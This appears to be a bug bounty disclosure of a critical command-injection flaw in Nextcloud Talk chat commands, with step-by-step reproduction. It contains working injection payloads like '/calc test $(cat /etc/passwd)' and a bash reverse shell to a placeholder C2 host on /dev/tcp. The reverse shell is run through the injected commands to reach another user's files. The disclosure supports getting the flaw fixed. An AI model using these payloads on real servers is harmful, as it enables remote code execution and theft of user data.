The Nextcloud Talk app allows system administrators to setup chat commands that can be executed in Talk using the “/command” syntax. Users can provide additional arguments to the commands, such as “/calc 1+1” or “/wiki Hello”, which are passed to the underlying script using @exec
. If arguments are accepted, it is possible to trigger arbitrary code by wrapping the code in bash subcommand syntax /wiki test $(mycommand)
. This allows for arbitrary code execution, which an actor can use to spawn a reverse shell back from the remote machine.
This bug has been filed with a severity of Critical
inline with the bounty impact/definition chart and the Nextcloud Threat Model as the bug allows both remote code execution via a non-admin user as well as access of complete user data of any other user.
All versions that support Talk Commands appear to be affected as the bug is in the @execute
command.
The following version were tested:
snap install nextcloud --edge
, occ.status versionstring: 19.0.0 beta 2
snap install nextcloud
, occ.status versionstring: 17.0.5
Install and Setup Nextcloud
snap install nextcloud --edge
)nextcloud.manual-install "admin" "password"
nextcloud.enable-https self-signed
nextcloud.occ config:system:set trusted_domains 1 --value=<domain/ip>
alice
nextcloud.occ talk:command:add-samples
Setup C2 VM
nc
nc -l -p 8888
Create Shell Script > shell.sh
> This script can be anything that gets executed and returns a shell
> In this case, a simple reverse shell is initiated using bash interactive piping to /dev/tcp
> A php web shell, meterpreter binary or any other executable could be uploaded here
bash -i >& /dev/tcp/<c2-ip-here>/8888 0>&1 &
Log In As Alice and Upload File
With Alice, start a Talk Conversation
Test Exploitability:
> Note, all commands appear to get successfully executed, however whether output is shown depends on the implementation of the backing script. For example, /wiki cannot show the results of cat /etc/passwd
because the multiline output breaks the wiki script, but the calculator sample can show the output because it has an echo command in the scrpt.
/wiki test $(id)
/wiki test $(pwd)
/wiki test $(ls -al .)
/calc test $(cat /etc/passwd)
/calc test $(ls -al ../)
Execute Reverse Shell
/calc test $(ls ../)
to explore directory structure/wiki test $(chmod +x /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
/wiki test $(bash /var/snap/nextcloud/common/nextcloud/data/alice/files/shell.sh)
Observer C2 Listener for Connection
Run Commands via C2
id
pwd
cd /var/snap/nextcloud/common/nextcloud/data/admin/files
ls -al
occ status
See attached screenshots